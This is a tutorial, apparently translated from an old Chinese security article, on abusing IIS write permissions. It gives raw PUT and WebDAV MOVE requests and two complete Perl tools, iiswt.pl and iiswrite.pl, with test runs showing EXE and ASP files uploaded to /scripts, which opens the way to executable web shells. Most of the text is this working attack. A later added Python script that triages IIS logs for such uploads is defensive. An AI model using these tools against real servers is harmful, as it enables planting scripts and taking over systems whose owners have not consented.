You may have read the article on remotely analysing IIS settings, which covers a number of IIS configuration options. Here I look at one of them, IIS write permissions, starting from the way that article tests them. Write permission: to find out whether a directory is writable by the web user, telnet to the server's web port (80) and send the following request:
PUT /DIR/my_file.txt HTTP/1.1
Host: IIS-Server
Content-Length: 10

The server first answers with a 100 (Continue) message:

HTTP/1.1 100 Continue
Server: Microsoft-IIS/5.0
Date: Thu, 28 Feb 2002 15:56:00 GMT
Then we type 10 characters as the request body.
Once the body has been sent, look at what the server returns. A 201 Created response looks like this:
HTTP/1.1 201 Created
Server: Microsoft-IIS/5.0
Date: Thu, 28 Feb 2002 15:56:08 GMT
Location: http://IIS-Server/DIR/my_file.txt
Content-Length: 0
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK
A 201 means write permission is enabled on that directory. A 403 error means it is not. A 401 (Unauthorized) response means write permission is enabled but anonymous users are not allowed to use it, so authentication would be required. If both "Write" and "Scripts and Executables" are enabled on a directory, a web user can upload a program and then execute it! Here is a brief description of the request:
PUT /DIR/my_file.txt HTTP/1.1
Host: IIS-Server
Content-Length: 10
PUT: asks the server to store the enclosed entity at the request URL. If the URL points to an existing resource, the entity is treated as a modified version of that resource on the origin server. If the URL does not point to an existing resource, the user agent is defining it as a new resource, and the origin server creates the resource at that URL.
Host: the address the HTTP request is sent to.
Content-Length: the length of the body, that is, the size of the entity. It must match the size of the file being uploaded.
Submitting this by hand with nc or telnet is tedious, so here is a simple Perl program that does the submission for us. The program opens the file with binmode() so that binary content is sent unchanged. The code:
#!/usr/bin/perl
# iiswt.pl - write a local file to an IIS directory with a single HTTP PUT
use strict;
use warnings;
use IO::Socket;

my $argc = @ARGV;
if ($argc != 4) {
    print "Usage: $0 127.0.0.1 80 kaka.exe /scripts/file.exe\n";
    exit;
}
my $host = $ARGV[0];
my $port = $ARGV[1];
my $file = $ARGV[2];
my $path = $ARGV[3];

my @s    = stat("$file");
my $size = $s[7];                       # get the file size for Content-Length
print "$file size is $size bytes\n";

my $sock = IO::Socket::INET->new(Proto    => "tcp",
                                 PeerAddr => $host,
                                 PeerPort => $port)
    || die "Sorry! Could not connect to $host\n";

# request line and headers; the empty line ends the header block
print $sock "PUT $path HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Content-Length: $size\n\n";

open(FILE, "<", $file) || die "can't open $file\n";
binmode(FILE);                          # read the file in binary mode
my $char;
while (read(FILE, $char, 1024)) {       # stream the file contents as the body
    print $sock $char;
}
print $sock "\n";

my @req = <$sock>;                      # read the whole reply
print "Please wait...\n";
sleep(2);
# the reply starts with "100 Continue", two headers and a blank line,
# so the status line of the real response is the fifth line
if (defined $req[4] && $req[4] =~ /200|201/) {
    print "upfile succeed!!!\n";
} else {
    print "upfile faile!!!\n";
    print @req;                         # show the server's error reply
}
close $sock;
close FILE;
The following is a test:
C:\usr\bin> perl.exe iiswt.pl 127.0.0.1 80 kaka.txt /scripts/kaka.txt
kaka.txt size is 14 bytes
Please wait...
upfile succeed!!!

C:\Inetpub\scripts> dir kaka.txt
 The volume in drive C is not labeled.
 The serial number of the volume is 3cd1-479e

 C:\Inetpub\scripts directory

                   14 kaka.txt
               1 file,             14 bytes
               0 directories, 3,871,080,448 available bytes
kaka.txt has now been uploaded to the web directory scripts. Since the program opens the file with binmode() (binary mode), other kinds of files should upload just as well. First an EXE file:
C:\usr\bin> perl.exe iiswt.pl 127.0.0.1 80 perl.exe /scripts/perl.exe
perl.exe size is 20535 bytes
Please wait...
upfile succeed!!!

C:\Inetpub\scripts> dir perl.exe
 The volume in drive C is not labeled.
 The serial number of the volume is 3cd1-479e

 C:\Inetpub\scripts directory

               20,535 perl.exe
               1 file,         20,535 bytes
               0 directories, 3,871,031,296 available bytes

So EXE files can be uploaded too. Can any file be uploaded? Next, an ASP file:

C:\usr\bin> perl.exe iiswt.pl 127.0.0.1 80 kaka.asp /scripts/kaka.asp
kaka.asp size is 4 bytes
Please wait...
upfile faile!!!
HTTP/1.1 100 Continue
Server: Microsoft-IIS/5.0
Date: Tue, 04 May 2004 16:45:51 GMT

HTTP/1.1 403 Forbidden
Server: Microsoft-IIS/5.0
Date: Tue, 04 May 2004 16:45:51 GMT
Connection: Close
Content-Type: text/html
Content-Length: 44

<body><h2>HTTP/1.1 403 Forbidden</h2></body>
Failed! The server answered "HTTP/1.1 403 Forbidden". It seems an ASP file cannot be written directly with PUT. Further testing showed that any file type IIS handles itself as a script produces this 403 Forbidden error. So how can a file of such a type be written? Besides PUT, POST and GET, IIS also accepts the WebDAV COPY and MOVE methods! We can first upload the local ASP file to the remote web directory under a different name, such as a .txt file, and then use the COPY or MOVE method just mentioned to rename it to .asp. Testing the rename with nc:
D:\> nc 127.0.0.1 80
MOVE /scripts/kaka.txt HTTP/1.1
Host: 127.0.0.1
Destination: http://127.0.0.1/scripts/kaka.asp

HTTP/1.1 201 Created
Server: Microsoft-IIS/5.0
Date: Sun, 05 Oct 2003 09:30:59 GMT
Location: http://127.0.0.1/scripts/X.asp
Content-Type: text/xml
Content-Length: 0
MOVE renames /scripts/kaka.txt to /scripts/kaka.asp. Combining PUT with MOVE therefore gives an easy way to write files of any type through IIS :). Again in Perl; this time the ASP write test succeeded:
C:\usr\bin> perl kaka.pl 127.0.0.1 80 kaka.asp /scripts/kaka.asp
************************************************************
Codz by superhei <QQ:123230273> & Lanker <QQ:18779569>
************************************************************
kaka.asp size is 4 bytes
Please wait...
upfile succeed!!!
modifyfile succeed!!!
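From the defender's side, the same facts the article uses to probe a server (201 means a write succeeded, 401 means write is enabled but anonymous access is refused, 403 means the write was denied, and a successful PUT followed by a MOVE or COPY of the same path is how a harmless upload becomes a script) are what an administrator should look for in the IIS logs. The following Python script is an added example, not code from the article or its authors. It reads IIS W3C extended log lines, takes the column order from the #Fields: directive as IIS writes it, classifies every WebDAV write verb by status code, and ties a later MOVE or COPY back to the PUT of the same path by the same client. The log lines are constructed samples, and the severity labels are my own choice.

```python
"""Triage IIS W3C extended log lines for WebDAV write activity.

Added example (not from the original article). The log lines below are
constructed samples in the IIS W3C format; the column order is taken from the
#Fields: directive, as IIS writes it.
"""
from dataclasses import dataclass
from typing import Iterator, List

SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-method cs-uri-stem sc-status
2004-05-04 16:45:40 10.0.0.5 GET /default.htm 200
2004-05-04 16:45:51 10.0.0.5 PUT /scripts/kaka.asp 403
2004-05-04 16:46:02 10.0.0.5 PUT /scripts/lanker.txt 201
2004-05-04 16:46:05 10.0.0.5 MOVE /scripts/lanker.txt 201
2004-05-04 16:47:00 10.0.0.9 PUT /scripts/note.txt 401
"""

# WebDAV verbs that change content on the server; GET/HEAD/POST are ignored
WRITE_METHODS = {"PUT", "MOVE", "COPY", "DELETE", "MKCOL", "PROPPATCH"}


@dataclass
class Finding:
    severity: str   # "low", "medium", "high" or "critical" (my own scale)
    client: str
    method: str
    path: str
    status: int
    note: str


def parse_w3c(text: str) -> Iterator[dict]:
    """Yield one dict per data line, keyed by the names in the #Fields: line."""
    fields = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#"):          # other directives (#Software, #Date, ...)
            continue
        if fields is None:
            raise ValueError("data line appears before a #Fields: directive")
        values = line.split()
        if len(values) != len(fields):
            raise ValueError(f"column count does not match #Fields: {line!r}")
        yield dict(zip(fields, values))


def analyse(text: str) -> List[Finding]:
    """Classify write attempts using the status-code meanings from the article."""
    findings: List[Finding] = []
    # successful PUTs, keyed by (client, path), so a later MOVE/COPY of the
    # same path by the same client can be tied back to the upload
    uploaded = set()
    for rec in parse_w3c(text):
        method = rec["cs-method"].upper()
        if method not in WRITE_METHODS:
            continue
        client, path = rec["c-ip"], rec["cs-uri-stem"]
        status = int(rec["sc-status"])
        if 200 <= status < 300:
            if method == "PUT":
                uploaded.add((client, path))
                findings.append(Finding("high", client, method, path, status,
                                        "file written by a web user"))
            elif method in ("MOVE", "COPY") and (client, path) in uploaded:
                findings.append(Finding("critical", client, method, path, status,
                                        "uploaded file renamed or copied; "
                                        "check the destination extension"))
            else:
                findings.append(Finding("high", client, method, path, status,
                                        "WebDAV write verb succeeded"))
        elif status == 401:
            findings.append(Finding("medium", client, method, path, status,
                                    "write enabled but anonymous access denied"))
        elif status == 403:
            findings.append(Finding("low", client, method, path, status,
                                    "write attempt refused"))
        else:
            findings.append(Finding("low", client, method, path, status,
                                    "write verb with unexpected status"))
    return findings


if __name__ == "__main__":
    for f in analyse(SAMPLE_LOG):
        print(f"[{f.severity:8}] {f.client} {f.method} {f.path} -> {f.status}: {f.note}")
```

Run against a real log, the script needs whatever columns the server's #Fields: line actually lists; c-ip, cs-method, cs-uri-stem and sc-status are all standard IIS field names. The MOVE destination is not logged by IIS, so the rename is flagged by correlating it with the preceding PUT rather than by reading the Destination header.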
The final iiswrite.pl code follows (I drafted the code in this article at an Internet cafe while writing it; Lanker then tested and completed it. Thanks, Lanker.):
#!/usr/bin/perl
# iiswrite.pl - PUT a local file under a harmless name, then MOVE it to the
# requested name, so that types IIS refuses to PUT directly (such as .asp)
# can still be written
use strict;
use warnings;
use IO::Socket;

my $argc = @ARGV;
print "*" x 60;
print "\nCodz by superhei <QQ:123230273> & Lanker <QQ:18779569>\n";
print "*" x 60, "\n";
if ($argc != 4) {
    print "Usage: $0 127.0.0.1 80 kaka.txt /scripts/my_file.txt\n";
    exit;
}
my $host = $ARGV[0];
my $port = $ARGV[1];
my $file = $ARGV[2];
my $path = $ARGV[3];

# split the target path into directory and file name; only the directory
# part is used for the temporary upload name
my @parts = split("/", $path);
my $name  = pop(@parts);
my $path1 = join("/", @parts);

my @s    = stat("$file");
my $size = $s[7];                       # file size for Content-Length
print "$file size is $size bytes\n";

# step 1: PUT the file as lanker.txt in the target directory
my $sock = IO::Socket::INET->new(Proto    => "tcp",
                                 PeerAddr => $host,
                                 PeerPort => $port)
    || die "Sorry! Could not connect to $host\n";
print $sock "PUT $path1/lanker.txt HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Content-Length: $size\n\n";
open(FILE, "<", $file) || die "can't open $file\n";
binmode(FILE);                          # send the file unchanged
my $char;
while (read(FILE, $char, 1024)) {
    print $sock $char;
}
print $sock "\n";
my @req = <$sock>;
print "Please wait...\n";
sleep(2);
# after "100 Continue" and its headers, the fifth line is the real status line
if (defined $req[4] && $req[4] =~ /200|201/) {
    print "upfile succeed!!!\n";
} else {
    print "upfile faile!!!\n";
}
close $sock;
close FILE;

# step 2: MOVE lanker.txt to the name that was asked for
$sock = IO::Socket::INET->new(Proto    => "tcp",
                              PeerAddr => $host,
                              PeerPort => $port)
    || die "Sorry! Could not connect to $host\n";
print $sock "MOVE $path1/lanker.txt HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Destination: http://${host}:${port}${path}\n\n";
@req = <$sock>;
# a 2xx status line on the MOVE reply means the rename went through
if (defined $req[0] && $req[0] =~ / 20\d /) {
    print "modifyfile succeed!!!\n";
} else {
    print "modifyfile faile!!!\n";
}
close $sock;